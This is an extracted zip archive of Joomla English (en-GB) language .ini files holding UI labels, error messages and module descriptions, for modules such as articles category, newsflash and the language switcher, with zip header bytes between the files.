JLIB_LOGIN_AUTHORISATION="Your access has been authorised."
JLIB_LOGIN_DENIED="Your access has been denied."
JLIB_LOGIN_EXPIRED="Your authentication has expired."

JLIB_MAIL_FUNCTION_DISABLED="The mail() function has been disabled and the mail can't be sent."
JLIB_MAIL_FUNCTION_OFFLINE="The mail function has been disabled by an administrator."
JLIB_MAIL_INVALID_EMAIL_SENDER="JMail: : Invalid email Sender: %s, JMail: :setSender(%s)."

JLIB_MEDIA_ERROR_UPLOAD_INPUT="Unable to upload file."
JLIB_MEDIA_ERROR_WARNFILENAME="File name must only have alphanumeric characters and no spaces."
JLIB_MEDIA_ERROR_WARNFILETOOLARGE="This file is too large to upload."
JLIB_MEDIA_ERROR_WARNFILETYPE="This file type is not supported."
JLIB_MEDIA_ERROR_WARNIEXSS="Possible IE XSS Attack found."
JLIB_MEDIA_ERROR_WARNINVALID_IMG="Not a valid image."
JLIB_MEDIA_ERROR_WARNINVALID_MIME="Invalid mime type detected."
JLIB_MEDIA_ERROR_WARNINVALID_MIMETYPE="Illegal mime type detected: %s"
JLIB_MEDIA_ERROR_WARNNOTADMIN="Uploaded file is not an image file and you do not have permission."

JLIB_MENUS_PRESET_JOOMLA="Preset - Joomla"
JLIB_MENUS_PRESET_MODERN="Preset - Modern"

JLIB_NO_EDITOR_PLUGIN_PUBLISHED="Unable to display an editor because no editor plugin is published."

JLIB_PLUGIN_ERROR_LOADING_PLUGINS="Error loading Plugins: %s"
JLIB_REGISTRY_EXCEPTION_LOAD_FORMAT_CLASS="Unable to load format class."

JLIB_RULES_ACTION="Action"
JLIB_RULES_ALLOWED="Allowed"
JLIB_RULES_ALLOWED_ADMIN="Allowed (Super User)"
JLIB_RULES_ALLOWED_INHERITED="Allowed (Inherited)"
JLIB_RULES_CALCULATED_SETTING="Calculated Setting"
JLIB_RULES_CONFLICT="Conflict"
JLIB_RULES_DATABASE_FAILURE="Failed storing the data to the database."
JLIB_RULES_DENIED="Denied"
JLIB_RULES_GROUP="%s"
JLIB_RULES_GROUPS="Groups"
JLIB_RULES_INHERIT="Inherit"
JLIB_RULES_INHERITED="Inherited"
JLIB_RULES_NOT_ALLOWED="Not Allowed"
JLIB_RULES_NOT_ALLOWED_ADMIN_CONFLICT="Conflict"
JLIB_RULES_NOT_ALLOWED_DEFAULT="Not Allowed (Default)"
JLIB_RULES_NOT_ALLOWED_INHERITED="Not Allowed (Inherited)"
JLIB_RULES_NOT_ALLOWED_LOCKED="Not Allowed (Locked)"
JLIB_RULES_NOT_SET="Not Set"
JLIB_RULES_NOTICE_RECALCULATE_GROUP_PERMISSIONS="Super User permissions changed. Save or reload to recalculate this group permissions."
JLIB_RULES_NOTICE_RECALCULATE_GROUP_CHILDS_PERMISSIONS="Permissions changed in a group with child groups. Save or reload to recalculate the child groups permissions."
JLIB_RULES_REQUEST_FAILURE="Failed sending the data to server."
JLIB_RULES_SAVE_BEFORE_CHANGE_PERMISSIONS="Please save before changing permissions."
JLIB_RULES_SELECT_ALLOW_DENY_GROUP="Allow or deny %s for users in the %s group."
JLIB_RULES_SELECT_SETTING="Select New Setting"
JLIB_RULES_SETTING_NOTES="If you change the setting, it will apply to this and all child groups, components and content. Note that <em><strong>Denied</strong></em> will overrule any inherited setting and also the setting in any child group, component or content. In the case of a setting conflict, <em><strong>Deny</strong></em> will take precedence. <em><strong>Not Set</strong></em> is equivalent to <em><strong>Denied</strong></em> but can be changed in child groups, components and content."
JLIB_RULES_SETTING_NOTES_ITEM="If you change the setting, it will apply to this item. Note that:<br /><em><strong>Inherited</strong></em> means that the permissions from global configuration, parent group and category will be used.<br /><em><strong>Denied</strong></em> means that no matter what the global configuration, parent group or category settings are, the group being edited can't take this action on this item.<br /><em><strong>Allowed</strong></em> means that the group being edited will be able to take this action for this item (but if this is in conflict with the global configuration, parent group or category it will have no impact; a conflict will be indicated by <em><strong>Not Allowed (Inherited)</strong></em> under Calculated Settings)."
JLIB_RULES_SETTINGS_DESC="Manage the permission settings for the user groups below. See notes at the bottom."

JLIB_STEMMER_INVALID_STEMMER="Invalid stemmer type %s"

JLIB_UNKNOWN="Unknown"
JLIB_UPDATER_ERROR_COLLECTION_FOPEN="The PHP allow_url_fopen setting is disabled. This setting must be enabled for the updater to work."
JLIB_UPDATER_ERROR_COLLECTION_OPEN_URL="Update: :Collection: Could not open %s"
JLIB_UPDATER_ERROR_COLLECTION_PARSE_URL="Update: :Collection: Could not parse %s"
JLIB_UPDATER_ERROR_EXTENSION_OPEN_URL="Update: :Extension: Could not open %s"
JLIB_UPDATER_ERROR_EXTENSION_PARSE_URL="Update: :Extension: Could not parse %s"
JLIB_UPDATER_ERROR_OPEN_UPDATE_SITE="Update: Could not open update site #%d &quot;%s&quot;, URL: %s"
JLIB_USER_ERROR_AUTHENTICATION_FAILED_LOAD_PLUGIN="JAuthentication: :authenticate: Failed to load plugin: %s"
JLIB_USER_ERROR_AUTHENTICATION_LIBRARIES="JAuthentication: :__construct: Could not load authentication libraries."
JLIB_USER_ERROR_BIND_ARRAY="Unable to bind array to user object."
JLIB_USER_ERROR_CANNOT_CHANGE_SUPER_USER="A user is not allowed to change permissions of a Super User group."
JLIB_USER_ERROR_CANNOT_CHANGE_OWN_GROUPS="A user is not allowed to change permissions of their own group(s)."
JLIB_USER_ERROR_CANNOT_CHANGE_OWN_PARENT_GROUPS="A user is not allowed to change permissions of their own group(s) parent group(s)."
JLIB_USER_ERROR_CANNOT_DEMOTE_SELF="You can't remove your own Super User permissions."
JLIB_USER_ERROR_CANNOT_REUSE_PASSWORD="You can't reuse your current password, please enter a new password."
JLIB_USER_ERROR_ID_NOT_EXISTS="JUser: :_load: User %s does not exist."
JLIB_USER_ERROR_NOT_SUPERADMIN="Only users with Super User permissions can change other Super User user accounts."
JLIB_USER_ERROR_PASSWORD_NOT_MATCH="Passwords do not match. Please re-enter password."
JLIB_USER_ERROR_UNABLE_TO_FIND_USER="Unable to find a user with given activation string."
JLIB_USER_ERROR_UNABLE_TO_LOAD_USER="JUser: :_load: Unable to load user with ID: %s"
JLIB_USER_EXCEPTION_ACCESS_USERGROUP_INVALID="User group does not exist."
JLIB_UTIL_ERROR_APP_INSTANTIATION="Application Startup Error."
JLIB_UTIL_ERROR_CONNECT_DATABASE="JDatabase: :getInstance: Could not connect to database <br />joomla.library: %1$s - %2$s"
JLIB_UTIL_ERROR_DOMIT="DommitDocument is deprecated. Use DomDocument instead."
JLIB_UTIL_ERROR_LOADING_FEED_DATA="Error loading feed data."
JLIB_UTIL_ERROR_XML_LOAD="Failed loading XML file."
PK!v�ll en-GB/en-GB.mod_random_image.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_RANDOM_IMAGE="Random Image"
MOD_RANDOM_IMAGE_FIELD_FOLDER_DESC="Path to the image folder relative to the site URL (eg images)."
MOD_RANDOM_IMAGE_FIELD_FOLDER_LABEL="Image Folder"
MOD_RANDOM_IMAGE_FIELD_HEIGHT_DESC="Image height forces all images to be displayed with the height in pixels."
MOD_RANDOM_IMAGE_FIELD_HEIGHT_LABEL="Height (px)"
MOD_RANDOM_IMAGE_FIELD_LINK_DESC="A URL to redirect to if the image is selected (eg https://www.joomla.org)."
MOD_RANDOM_IMAGE_FIELD_LINK_LABEL="Link"
MOD_RANDOM_IMAGE_FIELD_TYPE_DESC="Type of image PNG/GIF/JPG etc (the default is JPG)."
MOD_RANDOM_IMAGE_FIELD_TYPE_LABEL="Image Type"
MOD_RANDOM_IMAGE_FIELD_WIDTH_DESC="Image width forces all images to be displayed with this width in pixels."
MOD_RANDOM_IMAGE_FIELD_WIDTH_LABEL="Width (px)"
MOD_RANDOM_IMAGE_NO_IMAGES="No Images"
MOD_RANDOM_IMAGE_XML_DESCRIPTION="This module displays a random image from your chosen folder."
PK!8��5�� en-GB/en-GB.mod_weblinks.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_WEBLINKS="Web Links"
MOD_WEBLINKS_XML_DESCRIPTION="This modules displays Web Links from a category defined in the Web Links component."
MOD_WEBLINKS_LAYOUT_DEFAULT="Default"

PK!�l�׮�!en-GB/en-GB.mod_articles_news.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_ARTICLES_NEWS="Articles - Newsflash"
MOD_ARTICLES_NEWS_FIELD_FEATURED_DESC="Show or hide articles marked as featured."
MOD_ARTICLES_NEWS_FIELD_FEATURED_LABEL="Featured Articles"
MOD_ARTICLES_NEWS_FIELD_CATEGORY_DESC="Select Articles from a specific Category or a set of Categories. If no selection will show all categories as default."
MOD_ARTICLES_NEWS_FIELD_IMAGES_ARTICLE_DESC="Display the intro or full image."
MOD_ARTICLES_NEWS_FIELD_IMAGES_ARTICLE_LABEL="Show Intro/Full Image"
MOD_ARTICLES_NEWS_FIELD_IMAGES_DESC="Show the images that are inside the text of the article."
MOD_ARTICLES_NEWS_FIELD_IMAGES_LABEL="Show Article Images"
MOD_ARTICLES_NEWS_FIELD_ITEMS_DESC="The number of Articles to display within this module."
MOD_ARTICLES_NEWS_FIELD_ITEMS_LABEL="Number of Articles"
MOD_ARTICLES_NEWS_FIELD_LINKTITLE_DESC="Link the Article titles to Articles."
MOD_ARTICLES_NEWS_FIELD_LINKTITLE_LABEL="Linked Titles"
MOD_ARTICLES_NEWS_FIELD_ORDERING_DESC="Select the order in which you want query results presented."
MOD_ARTICLES_NEWS_FIELD_ORDERING_LABEL="Order Results"
MOD_ARTICLES_NEWS_FIELD_ORDERING_CREATED_DATE="Created Date"
MOD_ARTICLES_NEWS_FIELD_ORDERING_MODIFIED_DATE="Modified Date"
MOD_ARTICLES_NEWS_FIELD_ORDERING_PUBLISHED_DATE="Published Date"
MOD_ARTICLES_NEWS_FIELD_ORDERING_ORDERING="Ordering"
MOD_ARTICLES_NEWS_FIELD_ORDERING_RANDOM="Random"
MOD_ARTICLES_NEWS_FIELD_READMORE_DESC="If set to Show, the 'Read more ...' link will show if Main text has been provided for an Article."
MOD_ARTICLES_NEWS_FIELD_READMORE_LABEL="'Read more ...' Link"
MOD_ARTICLES_NEWS_FIELD_SEPARATOR_DESC="Show separator after last Article."
MOD_ARTICLES_NEWS_FIELD_SEPARATOR_LABEL="Show Last Separator"
MOD_ARTICLES_NEWS_FIELD_TITLE_DESC="Show or hide the Article title."
MOD_ARTICLES_NEWS_FIELD_TITLE_LABEL="Show Article Title"
MOD_ARTICLES_NEWS_FIELD_TRIGGEREVENTS_DESC="Triggers additional plugin events to display additional content like custom fields or voting information."
MOD_ARTICLES_NEWS_FIELD_TRIGGEREVENTS_LABEL="Trigger Plugin Events"
MOD_ARTICLES_NEWS_FIELD_SHOWINTROTEXT_DESC="Show or hide the article intro text."
MOD_ARTICLES_NEWS_FIELD_SHOWINTROTEXT_LABEL="Show Intro Text"
MOD_ARTICLES_NEWS_OPTION_FULLIMAGE="Full Image"
MOD_ARTICLES_NEWS_OPTION_INTROIMAGE="Intro Image"
MOD_ARTICLES_NEWS_READMORE="Read more ..."
MOD_ARTICLES_NEWS_READMORE_REGISTER="Register to Read More"
MOD_ARTICLES_NEWS_TITLE_HEADING="Header Level"
MOD_ARTICLES_NEWS_TITLE_HEADING_DESCRIPTION="Select the desired HTML header level for the Article titles."
MOD_ARTICLES_NEWS_VALUE_ONLY_SHOW_FEATURED="Only show Featured Articles"
MOD_ARTICLES_NEWS_XML_DESCRIPTION="The Article Newsflash Module will display a fixed number of Articles from a specific Category or a set of Categories."
PK!�js�"�"%en-GB/en-GB.mod_articles_category.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_ARTICLES_CATEGORY="Articles - Category"
MOD_ARTICLES_CATEGORY_FIELD_ARTICLEGROUPING_DESC="Select how you would like the articles to be grouped."
MOD_ARTICLES_CATEGORY_FIELD_ARTICLEGROUPING_LABEL="Article Grouping"
MOD_ARTICLES_CATEGORY_FIELD_ARTICLEGROUPINGDIR_DESC="Select the direction you would like the Article Groupings to be ordered by."
MOD_ARTICLES_CATEGORY_FIELD_ARTICLEGROUPINGDIR_LABEL="Grouping Direction"
MOD_ARTICLES_CATEGORY_FIELD_ARTICLEORDERING_DESC="Select which field you would like Articles to be ordered by. Featured Ordering should only be used when Filtering Option for Featured Articles is set to 'Only'."
MOD_ARTICLES_CATEGORY_FIELD_ARTICLEORDERING_LABEL="Article Field to Order By"
MOD_ARTICLES_CATEGORY_FIELD_ARTICLEORDERINGDIR_DESC="Select the direction you would like Articles to be ordered by."
MOD_ARTICLES_CATEGORY_FIELD_ARTICLEORDERINGDIR_LABEL="Ordering Direction"
MOD_ARTICLES_CATEGORY_FIELD_AUTHOR_DESC="Select one or more authors from the list below."
MOD_ARTICLES_CATEGORY_FIELD_AUTHOR_LABEL="Authors"
MOD_ARTICLES_CATEGORY_FIELD_AUTHORALIAS_DESC="Select one or more author aliases from the list below."
MOD_ARTICLES_CATEGORY_FIELD_AUTHORALIAS_LABEL="Author Aliases"
MOD_ARTICLES_CATEGORY_FIELD_AUTHORALIASFILTERING_DESC="Select Inclusive to Include the Selected Author Aliases, Exclusive to Exclude the Selected Author Aliases."
MOD_ARTICLES_CATEGORY_FIELD_AUTHORALIASFILTERING_LABEL="Author Alias Filtering Type"
MOD_ARTICLES_CATEGORY_FIELD_AUTHORFILTERING_DESC="Select Inclusive to Include the Selected Authors, Exclusive to Exclude the Selected Authors."
MOD_ARTICLES_CATEGORY_FIELD_AUTHORFILTERING_LABEL="Author Filtering Type"
MOD_ARTICLES_CATEGORY_FIELD_CATDEPTH_DESC="The number of child category levels to return."
MOD_ARTICLES_CATEGORY_FIELD_CATDEPTH_LABEL="Category Depth"
MOD_ARTICLES_CATEGORY_FIELD_CATEGORY_DESC="Please select one or more categories."
MOD_ARTICLES_CATEGORY_FIELD_CATFILTERINGTYPE_DESC="Select Inclusive to Include the Selected Categories, Exclusive to Exclude the Selected Categories."
MOD_ARTICLES_CATEGORY_FIELD_CATFILTERINGTYPE_LABEL="Category Filtering Type"
MOD_ARTICLES_CATEGORY_FIELD_COUNT_DESC="The number of items to display. The default value of 0 will display all articles."
MOD_ARTICLES_CATEGORY_FIELD_COUNT_LABEL="Count"
MOD_ARTICLES_CATEGORY_FIELD_DATERANGEFIELD_DESC="Select which date field you want the date range to be applied to."
MOD_ARTICLES_CATEGORY_FIELD_DATERANGEFIELD_LABEL="Date Range Field"
MOD_ARTICLES_CATEGORY_FIELD_DATEFIELD_DESC="Select which date field you want to display."
MOD_ARTICLES_CATEGORY_FIELD_DATEFIELD_LABEL="Date Field"
MOD_ARTICLES_CATEGORY_FIELD_DATEFIELDFORMAT_DESC="Please enter in a valid date format. See: https://php.net/date for formatting information."
MOD_ARTICLES_CATEGORY_FIELD_DATEFIELDFORMAT_LABEL="Date Format"
MOD_ARTICLES_CATEGORY_FIELD_DATEFILTERING_DESC="Select Date Filtering Type."
MOD_ARTICLES_CATEGORY_FIELD_DATEFILTERING_LABEL="Date Filtering"
MOD_ARTICLES_CATEGORY_FIELD_DATEGROUPINGFIELD_DESC="Select which date field you want the date grouping to be applied to."
MOD_ARTICLES_CATEGORY_FIELD_DATEGROUPINGFIELD_LABEL="Date Grouping Field"
MOD_ARTICLES_CATEGORY_FIELD_ENDDATE_DESC="Please enter an End Date."
MOD_ARTICLES_CATEGORY_FIELD_ENDDATE_LABEL="To Date"
MOD_ARTICLES_CATEGORY_FIELD_EXCLUDEDARTICLES_DESC="Please enter each Article ID on a new line."
MOD_ARTICLES_CATEGORY_FIELD_EXCLUDEDARTICLES_LABEL="Article IDs to Exclude"
MOD_ARTICLES_CATEGORY_FIELD_GROUP_DISPLAY_LABEL="Display Options"
; The following string is deprecated and will be removed with 4.0
MOD_ARTICLES_CATEGORY_FIELD_GROUP_DYNAMIC_LABEL="Dynamic Mode Options"
MOD_ARTICLES_CATEGORY_FIELD_GROUP_FILTERING_LABEL="Filtering Options"
MOD_ARTICLES_CATEGORY_FIELD_GROUP_GROUPING_LABEL="Grouping Options"
MOD_ARTICLES_CATEGORY_FIELD_GROUP_ORDERING_LABEL="Ordering Options"
MOD_ARTICLES_CATEGORY_FIELD_INTROTEXTLIMIT_DESC="Please enter in a numeric character limit value. The introtext will be trimmed to the number of characters you enter."
MOD_ARTICLES_CATEGORY_FIELD_INTROTEXTLIMIT_LABEL="Introtext Limit"
MOD_ARTICLES_CATEGORY_FIELD_LINKTITLES_LABEL="Linked Titles"
MOD_ARTICLES_CATEGORY_FIELD_LINKTITLES_DESC="Linked titles."
MOD_ARTICLES_CATEGORY_FIELD_MODE_DESC="Please select the mode you would like to use. If Normal Mode is chosen, then configure the module and it will display a static list of Articles on the menu items you assign the module to. If Dynamic Mode is chosen, then you can still configure the module normally, however now the Category option will no longer be used. Instead, the module will dynamically detect if you are on a Category view and will display the list of articles within that Category. When Dynamic Mode is chosen, it is best to leave the module set to display on all pages, as it will decide to display anything dynamically."
MOD_ARTICLES_CATEGORY_FIELD_MODE_LABEL="Mode"
MOD_ARTICLES_CATEGORY_FIELD_MONTHYEARFORMAT_DESC="Please enter in a valid date format. See: https://php.net/date for formatting information."
MOD_ARTICLES_CATEGORY_FIELD_MONTHYEARFORMAT_LABEL="Month and Year Display Format"
MOD_ARTICLES_CATEGORY_FIELD_RELATIVEDATE_DESC="Please enter a numeric value. Results will be retrieved relative to the current date and the value you enter."
MOD_ARTICLES_CATEGORY_FIELD_RELATIVEDATE_LABEL="Relative Date"
MOD_ARTICLES_CATEGORY_FIELD_SHOWAUTHOR_DESC="Select Show if you would like the author (or author alias instead, if available) to be displayed."
MOD_ARTICLES_CATEGORY_FIELD_SHOWCATEGORY_DESC="Select Show if you would like the category name displayed."
MOD_ARTICLES_CATEGORY_FIELD_SHOWCHILDCATEGORYARTICLES_DESC="Include or Exclude Articles from Child Categories."
MOD_ARTICLES_CATEGORY_FIELD_SHOWCHILDCATEGORYARTICLES_LABEL="Child Category Articles"
MOD_ARTICLES_CATEGORY_FIELD_SHOWDATE_DESC="Select Show if you would like the date displayed."
MOD_ARTICLES_CATEGORY_FIELD_SHOWFEATURED_DESC="Select to Show, Hide, or Only display Featured Articles."
MOD_ARTICLES_CATEGORY_FIELD_SHOWFEATURED_LABEL="Featured Articles"
MOD_ARTICLES_CATEGORY_FIELD_SHOWHITS_DESC="Select Show if you would like the hits for each article to be displayed."
MOD_ARTICLES_CATEGORY_FIELD_SHOWHITS_LABEL="Hits"
MOD_ARTICLES_CATEGORY_FIELD_SHOWINTROTEXT_DESC="Select Show if you would like the introtext to be displayed."
MOD_ARTICLES_CATEGORY_FIELD_SHOWINTROTEXT_LABEL="Introtext"
MOD_ARTICLES_CATEGORY_FIELD_SHOWONARTICLEPAGE_DESC="Select to Show or hide Article List from Article Pages. This means that the module will only display itself dynamically on Category Pages."
MOD_ARTICLES_CATEGORY_FIELD_SHOWONARTICLEPAGE_LABEL="Show on Article Page"
MOD_ARTICLES_CATEGORY_FIELD_SHOWTAGS_DESC="Show the tags for each article."
MOD_ARTICLES_CATEGORY_FIELD_STARTDATE_DESC="Please enter a Starting Date."
MOD_ARTICLES_CATEGORY_FIELD_STARTDATE_LABEL="Start Date Range"
MOD_ARTICLES_CATEGORY_OPTION_ASCENDING_VALUE="Ascending"
MOD_ARTICLES_CATEGORY_OPTION_CREATED_VALUE="Created Date"
MOD_ARTICLES_CATEGORY_OPTION_DATERANGE_VALUE="Date Range"
MOD_ARTICLES_CATEGORY_OPTION_DESCENDING_VALUE="Descending"
MOD_ARTICLES_CATEGORY_OPTION_DYNAMIC_VALUE="Dynamic"
MOD_ARTICLES_CATEGORY_OPTION_EXCLUDE_VALUE="Exclude"
MOD_ARTICLES_CATEGORY_OPTION_EXCLUSIVE_VALUE="Exclusive"
MOD_ARTICLES_CATEGORY_OPTION_HITS_VALUE="Hits"
MOD_ARTICLES_CATEGORY_OPTION_ID_VALUE="ID"
MOD_ARTICLES_CATEGORY_OPTION_INCLUDE_VALUE="Include"
MOD_ARTICLES_CATEGORY_OPTION_INCLUSIVE_VALUE="Inclusive"
MOD_ARTICLES_CATEGORY_OPTION_MODIFIED_VALUE="Modified Date"
MOD_ARTICLES_CATEGORY_OPTION_MONTHYEAR_VALUE="Month and Year"
MOD_ARTICLES_CATEGORY_OPTION_NORMAL_VALUE="Normal"
MOD_ARTICLES_CATEGORY_OPTION_OFF_VALUE="Off"
MOD_ARTICLES_CATEGORY_OPTION_ONLYFEATURED_VALUE="Only"
MOD_ARTICLES_CATEGORY_OPTION_ORDERING_VALUE="Article Order"
MOD_ARTICLES_CATEGORY_OPTION_ORDERINGFEATURED_VALUE="Featured Articles Order"
MOD_ARTICLES_CATEGORY_OPTION_RANDOM_VALUE="Random"
MOD_ARTICLES_CATEGORY_OPTION_RATING_VALUE="Rating"
MOD_ARTICLES_CATEGORY_OPTION_RELATIVEDAY_VALUE="Relative Date"
MOD_ARTICLES_CATEGORY_OPTION_STARTPUBLISHING_VALUE="Start Publishing Date"
MOD_ARTICLES_CATEGORY_OPTION_FINISHPUBLISHING_VALUE="Finish Publishing Date"
MOD_ARTICLES_CATEGORY_OPTION_VOTE_VALUE="Vote"
MOD_ARTICLES_CATEGORY_OPTION_YEAR_VALUE="Year"
MOD_ARTICLES_CATEGORY_READ_MORE="Read more: "
MOD_ARTICLES_CATEGORY_READ_MORE_TITLE="Read More ..."
MOD_ARTICLES_CATEGORY_REGISTER_TO_READ_MORE="Register to read more"
MOD_ARTICLES_CATEGORY_UNTAGGED="Untagged"
MOD_ARTICLES_CATEGORY_XML_DESCRIPTION="This module displays a list of articles from one or more categories."
PK!&i$��en-GB/en-GB.mod_falang.sys.ininu&1i�MOD_FALANG="FaLang Language Switcher"
MOD_FALANG_XML_DESCRIPTION="This module lets display in frontend the items tagged to a specific language"
MOD_FALANG_LAYOUT_DEFAULT="Default"PK!
�I���)en-GB/en-GB.mod_articles_category.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_ARTICLES_CATEGORY="Articles - Category"
MOD_ARTICLES_CATEGORY_XML_DESCRIPTION="This module displays a list of articles from one or more categories."
MOD_ARTICLES_CATEGORY_LAYOUT_DEFAULT="Default"

PK!�4���"en-GB/en-GB.lib_ic_library.sys.ininu&1i�; iC Library
; Copyright (c) 2013-2019 Cyril Rezé (www.joomlic.com). All rights reserved.
; License GNU General Public License version 3 or later <http://www.gnu.org/licenses/gpl.html>
; Note : All ini files need to be saved as UTF-8 - No BOM
;
; SITE                 : lib_ic_library.sys.ini
; Translation Platform : https://www.transifex.com/joomlic/icagenda

; Common boolean values
; Note: YES, NO, TRUE, FALSE are reserved words in INI format.
; Double quotes in the values have to be formatted as "_QQ_"

ICLIB_XML_DESCRIPTION="iC Library is a package of code which provides a related group of functions for the Joomla! Content Management System and JoomliC extensions"

PK!f�w�WW en-GB/en-GB.mod_users_latest.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_USERS_LATEST="Latest Users"
MOD_USERS_LATEST_FIELD_FILTER_GROUPS_DESC="Choose to filter by groups of the connected user."
MOD_USERS_LATEST_FIELD_FILTER_GROUPS_LABEL="Filter Groups"
MOD_USERS_LATEST_FIELD_LINKTOWHAT_DESC="Choose the type of information to display."
MOD_USERS_LATEST_FIELD_LINKTOWHAT_LABEL="User Information"
MOD_USERS_LATEST_FIELD_NUMBER_DESC="Number of latest registered users to display."
MOD_USERS_LATEST_FIELD_NUMBER_LABEL="Number of Users"
MOD_USERS_LATEST_FIELD_VALUE_CONTACT="Contact"
MOD_USERS_LATEST_FIELD_VALUE_PROFILE="Profile"
MOD_USERS_LATEST_XML_DESCRIPTION="This module displays the latest registered users."
PK!��22en-GB/en-GB.finder_cli.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

FINDER_CLI="Smart Search INDEXER"
FINDER_CLI_BATCH_COMPLETE=" * Processed batch %s in %s seconds."
FINDER_CLI_BATCH_CONTINUING=" * Continuing processing of batch ..."
FINDER_CLI_BATCH_PAUSING=" * Pausing processing for %s seconds ..."
FINDER_CLI_FILTER_RESTORE_WARNING="Warning: Did not find taxonomy %s/%s in filter %s"
FINDER_CLI_INDEX_PURGE="Clear index"
FINDER_CLI_INDEX_PURGE_FAILED="- index clear failed."
FINDER_CLI_INDEX_PURGE_SUCCESS="- index clear successful"
FINDER_CLI_PEAK_MEMORY_USAGE="Peak memory usage: %s bytes"
FINDER_CLI_PROCESS_COMPLETE="Total Processing Time: %s seconds."
FINDER_CLI_RESTORE_FILTER_COMPLETED="- number of filters restored: %s"
FINDER_CLI_RESTORE_FILTERS="Restoring filters"
FINDER_CLI_SAVE_FILTER_COMPLETED="- number of saved filters: %s"
FINDER_CLI_SAVE_FILTERS="Saving filters"
FINDER_CLI_SETTING_UP_PLUGINS="Setting up Smart Search plugins"
FINDER_CLI_SETUP_ITEMS="Setup %s items in %s seconds."
FINDER_CLI_SKIPPING_PAUSE_LOW_BATCH_PROCESSING_TIME=" * Skipping pause, as previous batch had a very low processing time (%ss < %ss)"
FINDER_CLI_STARTING_INDEXER="Starting Indexer"

PK!R����en-GB/en-GB.mod_stats.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_STATS="Statistics"
MOD_STATS_XML_DESCRIPTION="The Statistics Module shows information about your server installation together with statistics on the website users and the number of Articles in your database."
MOD_STATS_LAYOUT_DEFAULT="Default"

PK!���~~$en-GB/en-GB.mod_random_image.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_RANDOM_IMAGE="Random Image"
MOD_RANDOM_IMAGE_XML_DESCRIPTION="This module displays a random image from your chosen folder."
MOD_RANDOM_IMAGE_LAYOUT_DEFAULT="Default"

PK!,�SL��en-GB/en-GB.mod_languages.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_LANGUAGES="Language Switcher"
MOD_LANGUAGES_FIELD_ACTIVE_DESC="Display or not the active language. If displayed, the class 'lang-active' will be added to the element."
MOD_LANGUAGES_FIELD_ACTIVE_LABEL="Active Language"
MOD_LANGUAGES_FIELD_CACHING_DESC="Use the global cache setting to cache the content of this module or disable caching for this module.<br />This should be set to 'No caching' when using Associations."
MOD_LANGUAGES_FIELD_DROPDOWN_DESC="If set to 'Yes', the content languages native names will display in a dropdown."
MOD_LANGUAGES_FIELD_DROPDOWN_LABEL="Use Dropdown"
MOD_LANGUAGES_FIELD_DROPDOWN_IMAGE_DESC="Add image flags to the dropdown."
MOD_LANGUAGES_FIELD_DROPDOWN_IMAGE_LABEL="Use Flags For Dropdown"
MOD_LANGUAGES_FIELD_FOOTER_DESC="This is the text or HTML that is displayed below the language switcher."
MOD_LANGUAGES_FIELD_FOOTER_LABEL="Post-text"
MOD_LANGUAGES_FIELD_FULL_NAME_DESC="If set to 'Yes', full content language native names are displayed. If set to 'No', upper case abbreviations from the content languages URL Language Code are used. Example: EN for English, FR for French."
MOD_LANGUAGES_FIELD_FULL_NAME_LABEL="Languages Full Names"
MOD_LANGUAGES_FIELD_HEADER_DESC="This is the text or HTML that is displayed above the language switcher."
MOD_LANGUAGES_FIELD_HEADER_LABEL="Pre-text"
MOD_LANGUAGES_FIELD_INLINE_DESC="Default is set to 'Yes', ie to horizontal display."
MOD_LANGUAGES_FIELD_INLINE_LABEL="Horizontal Display"
MOD_LANGUAGES_FIELD_LINEHEIGHT_DESC="If set to 'Yes', will decrease the line height when using flags."
MOD_LANGUAGES_FIELD_LINEHEIGHT_LABEL="Line Height"
MOD_LANGUAGES_FIELD_MODULE_LAYOUT_DESC="Use a different layout from the supplied module or overrides in the default template."
MOD_LANGUAGES_FIELD_USEIMAGE_DESC="If set to 'Yes', will display language choice as image flags. Otherwise will use the content language native names."
MOD_LANGUAGES_FIELD_USEIMAGE_LABEL="Use Image Flags"
MOD_LANGUAGES_OPTION_DEFAULT_LANGUAGE="Default"
MOD_LANGUAGES_SPACERDROP_LABEL="<u>If Use Dropdown is set to 'Yes', <br />the display options below will be ignored</u>"
MOD_LANGUAGES_SPACERNAME_LABEL="<u>If Use Image Flags is set to 'Yes', <br />the display options below will be ignored</u>"
MOD_LANGUAGES_SPACER_USENAME_LABEL="<u>As 'Use Dropdown' and 'Use Image Flags' have been set to 'No',<br /> the switcher will display language names.</u>"
